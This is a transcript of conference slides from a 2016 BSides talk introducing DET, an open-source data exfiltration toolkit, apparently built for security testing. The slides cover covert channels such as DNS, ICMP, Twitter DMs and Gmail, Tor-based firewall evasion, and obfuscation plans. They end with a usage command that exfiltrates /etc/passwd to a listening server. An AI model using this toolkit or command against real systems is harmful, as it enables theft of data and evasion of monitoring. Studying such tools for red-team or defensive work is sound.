introducing (det) the data exfiltration toolkit
TRANSCRIPT
Introducing DET(Data Exfiltration Toolkit)
Paul Amar - BSides Ljubjana - 09/03/2016
100
General Approach
TCP
DNS
HTTP
ICMP
SMTP
General Approach
TCP
DNS
HTTP
ICMP
SMTP
General Approach
TCP
DNS
HTTP
ICMP
SMTP
General Approach
TCP
DNS
HTTP
ICMP
SMTP
General Approach
TCP
DNS
HTTP
ICMP
SMTP
General Approach
TCP
DNS
HTTP
ICMP
SMTP
HammerToss (July 2015)
What’s available today?
What’s available today?
And many more.. created almost everyday.
Not kidding.
Current state TCP
DNS
HTTP
ICMP
Twitter DMs
SMTP (eg. Gmail)
Introducing DET
Configuration file (JSON format)
File to exfiltrate
Folder to exfiltrate / multi-threaded
Plugin(s) to use
Plugin(s) to exclude
Server mode
Configuration file
List all your plugins and their configuration
Configuration file
Each plugin has its own configuration
(username, pwd, …)
Configuration file
Additional configuration (XOR Key, Sleeping time, …)
Let’s dig a bit (Client-side)
“Registration” phase 1/2
“Registration” phase 2/2
Sending the data 1/2
Sending the data 2/2
“End” phase 1/2
“End” phase 2/2
So in few words..
But wait! There’s moar.
Additional plugins (Tor Integration) 1/2
Source: http://foxglovesecurity.com/2015/11/02/hack-like-the-bad-guys-using-tor-for-
firewall-evasion-and-anonymous-remote-access/
Additional plugins (Tor Integration) 2/2
“Experimental” plugins
What’s next
- Port DET *entirely* to PowerShell (With Plugin based) (“Empire”-like)
- More plugins!
- Data obfuscation layer using Markov Chains
- https://github.com/bwall/markovobfuscate
InstallationGet/install it:
- git clone https://github.com/sensepost/DET
- pip install -r requirements --user (instal dependencies for the local user)
Client side:
- python det.py -f /etc/passwd -c ./config.json (or PS scripts)
Server side:
- python det.py -L -c ./config.json